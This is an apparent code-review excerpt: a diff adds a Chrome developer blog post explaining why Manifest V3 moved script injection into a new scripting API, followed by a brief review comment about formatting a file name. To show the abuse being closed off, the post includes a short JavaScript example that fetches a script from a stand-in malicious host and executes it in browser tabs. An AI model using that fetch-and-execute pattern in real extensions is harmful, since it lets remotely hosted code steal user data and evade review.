site/en/blog/crx-scripting-api/index.md

```diff
@@ -0,0 +1,306 @@
+developers when they're getting started and for the Chrome team as we maintain the platform and
+consider requests from the developer community.
+
+Another complicating factor is that the `tabs` permission is not well understood. While many other
+permissions restrict access to a given API (e.g. [`storage`][storage-api]), this permission is a bit
+unusual in that it only grants the extension access to sensitive properties on Tab instances (and by
+extension also impacts the Windows API). Understandably, many extension developers mistakenly think
+they need this permission in order to access methods on the Tabs API like `chrome.tabs.create` or,
+more germanely, `chrome.tabs.executeScript`. Moving functionality out of the Tabs API helps clear up
+some of this confusion.
+
+### Breaking changes
+
+When designing Manifest V3, one of the major issues that we wanted to address was abuse and malware
+enabled by "remotely-hosted code." It's common for abusive extension authors to execute scripts
+fetched from remote servers to steal user data, inject malware, and evade detection. While good
+actors also use this capability, we ultimately felt that it was simply too dangerous to remain as it
+was.
+
+There are a couple different ways that extensions can execute unbundled code, but the relevant one
+here is the Manifest V2 `chrome.tabs.executeScript` method. This method allows an extension to
+execute an arbitrary string of code in a target tab. This, in turn, means that a malicious developer
+can fetch an arbitrary script from a remote server and execute it inside any page the extension can
+access. We knew that if we wanted to address the remote code problem that we would have to drop this
+feature.
+
+```js
+(async function() {
+  let result = await fetch('https://evil.example.com/malware.js');
+  let script = await result.text();
+
+  chrome.tabs.executeScript({
+    code: script,
+  });
+})();
+```
+
+We also wanted to clean up some other, more subtle issues with the Manifest V2 version's design,
+and make the API a more polished and predictable tool.
+
+While we could have changed the signature of this method within the Tabs API, we felt that between
+these breaking changes and the introduction of new capabilities (covered in the next section), a
+clean break would be easier for everyone.
+
+### Expanding scripting capabilities
+
+Another consideration that fed into the Manifest V3 design process was a desire to introduce
+additional scripting capabilities to Chrome's extension platform. Specifically, we wanted to add
+support for declarative content scripts and to expand the capabilities of the `executeScript`
+method.
+
+Declarative content scripts support has been a long-standing feature request in Chromium. Today,
+Manifest V2 and V3 Chrome extensions can only statically declare content scripts in their
+manifest.json file; the platform doesn't provide a way to register new content scripts, tweak
```

Comment:
```suggestion
`manifest.json` file; the platform doesn't provide a way to register new content scripts, tweak
```

Maybe?  Not sure if we've aligned on that or not.

Reply:
I'm not sure either, but I'm generally in favor of explicit formatting on file names.